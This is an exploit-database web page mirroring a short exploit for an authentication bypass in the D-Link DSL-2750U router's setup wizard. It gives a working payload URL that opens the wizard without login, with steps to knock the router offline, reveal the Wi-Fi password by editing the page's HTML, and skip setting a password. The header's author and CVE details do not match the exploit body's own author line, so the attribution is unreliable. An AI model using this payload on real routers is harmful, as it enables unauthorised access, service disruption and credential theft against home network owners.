Advertisement






D-Link DSL-2750U Setup Wizard Page Authentication Bypass

CVE Category Price Severity
CVE-2018-7995 CWE-287 Not specified High
Author Risk Exploitation Type Date
Matthias Deeg of SySS GmbH High Remote 2018-08-28
CPE
cpe:cpe:/h:d-link:dsl-2750u
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018080199

Below is a copy:

D-Link DSL-2750U Setup Wizard Page Authentication Bypass
                                                           
                        
               
                      
                          
                    
                     
     # Exploit Title: Setup Wizard Page Authentication Bypass {Denial Of Service & Information Leakage}       
     # Exploit Author: Admin_JOKER           
     # Email: [email protected]       
     # Date: 2018-08-23       
     # Category: Webapps      
     # Vendor Homepage:https://www.dlink.com.sg/product/dsl-2750u-n300-wireless-adsl2-4-port-wi-fi-router/      
     # Tesed on: DSL-2750U      
     # Firmware Version:  1.11 / Work All Older Firmware          
     # Video : https://youtu.be/BQQbp2vn_wY             
                                                           

URL: http://[Router IP]/
Example URL : http://192.168.1.1

Payload : /cgi-bin/webproc?getpage=html/index.html&var:menu=setup&var:subpage=wizentrance&var:page=wizard
Example Payload : /cgi-bin/webproc?getpage=html/index.html&var:menu=setup&var:subpage=wizentrance&var:page=wizard

+-----------------------------------------------Setup Wizard Pages-----------------------------------------------------+
|Step 1: Set Time and Date  (No matter)          |
|Step 2: Setup Internet Connection(Give wrong information >> Denial of Service)            |
|Step 3: Configure Wireless Network(Change Type="password" to Type="text" in html code >> Information Leakage)    |
|Step 4: Set Password(Skip this Step )                 |
|Step 5: Completed and Quit(Finish)                |
+----------------------------------------------------------------------------------------------------------------------+

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum